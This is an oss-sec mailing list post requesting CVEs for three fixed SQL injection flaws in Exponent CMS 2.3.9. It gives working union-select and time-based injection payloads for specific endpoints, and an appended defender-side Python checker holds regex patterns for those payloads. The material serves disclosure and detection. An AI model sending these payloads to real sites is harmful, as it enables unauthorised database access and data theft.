oss-sec mailing list archives
CVE request: Exponent CMS 2.3.9 SQL injection vulnerabilities
From: felix k3y <felixk3y () gmail com>
Date: Sun, 18 Sep 2016 12:09:04 +0800
Hi,

I reported the following SQL Injection vulnerabilities to the ExponentCMS team on Sep 13, 2016:

1) https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/addressbook/controllers/addressController.php#L166-L175
2) https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/blog/controllers/blogController.php#L192-L195
3) https://github.com/exponentcms/exponent-cms/blob/master/framework/modules/core/controllers/expCommentController.php#L129-L134

/index.php?controller=address&action=activate_address

In the first case, you can send "id=1 and if(1,sleep(1),0)%23" in the POST data of an HTTP request;

/index.php?controller=blog&action=show&title=xx' union select 1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23

In the second, you can send "title=xx' union select 1,user(),3,4,5,6,7,8,9,0,11,2,3,4,5,6,7,8,9,0%23" in the GET data of an HTTP request;

/index.php?controller=expComment&action=showComments&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s&config[disable_nested_comments]=1

In the last one, you can send "content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s" in the GET data of an HTTP request.

And now, all SQL Injection vulnerabilities have been fixed.

https://exponentcms.lighthouseapp.com/projects/61783/changesets/e916702a91a6342bbab483a2be2ba2f11dca3aa3
https://github.com/exponentcms/exponent-cms/commit/e916702a91a6342bbab483a2be2ba2f11dca3aa3

I would like to request CVEs for those issues (if not done so).

thx.

--------------------------------------
felixk3y#gmail.com
penghua#silence.com.cn
PKAV Team
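Added here as a defender-side illustration, not part of the original message or of the Exponent CMS project: a small Python checker that decodes the query string and POST body of constructed sample requests modelled on the three endpoints in the report and flags the payload shapes described (union/select, sleep(), comment terminators, non-numeric values in parameters that should be integers). The sample requests, the INTEGER_PARAMS set and the signature list are my assumptions, not anything from the page or the project.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample requests (method, request target, POST body) modelled on the
# three reports above; not captured traffic. The address-book case carries its
# payload in the POST body, which a plain access log would not record.
SAMPLE_REQUESTS = [
    ("POST", "/index.php?controller=address&action=activate_address",
     "id=1 and if(1,sleep(1),0)%23"),
    ("GET", "/index.php?controller=blog&action=show"
            "&title=xx'%20union%20select%201,user(),3%23", ""),
    ("GET", "/index.php?controller=expComment&action=showComments"
            "&content_id=11%20union%20select%201,2,3,4,version(),6,7,8,9,10,11--%20s"
            "&config[disable_nested_comments]=1", ""),
    ("GET", "/index.php?controller=blog&action=show&title=hello-world", ""),   # benign
    ("POST", "/index.php?controller=address&action=activate_address", "id=42"),  # benign
]

# Assumed: these parameters are meant to be integers, so any non-digit value is suspect.
INTEGER_PARAMS = {"id", "content_id"}

# Shapes seen in the reported payloads, matched against the decoded parameter value.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-based", re.compile(r"\bsleep\s*\(", re.I)),
    ("comment-terminator", re.compile(r"#|--\s")),
]

def params_of(target, body):
    """Decode query-string and body parameters into (name, value) pairs."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return pairs + parse_qsl(body, keep_blank_values=True)

def findings(method, target, body):
    """Return [(param, reason)] for every parameter that looks like an injection attempt."""
    out = []
    for name, value in params_of(target, body):
        if name in INTEGER_PARAMS and not value.strip().isdigit():
            out.append((name, "non-integer value in integer parameter"))
        out += [(name, label) for label, rx in SIGNATURES if rx.search(value)]
    return out

def scan(requests=SAMPLE_REQUESTS):
    """Map each request's index to its findings; benign requests map to []."""
    return {i: findings(*req) for i, req in enumerate(requests)}

if __name__ == "__main__":
    for i, hits in scan().items():
        print(i, SAMPLE_REQUESTS[i][0], SAMPLE_REQUESTS[i][1][:60], hits or "clean")
```

The integer check catches the address-book and comment cases even without a signature match, which is the same property the fix relies on when it casts those parameters before building the query.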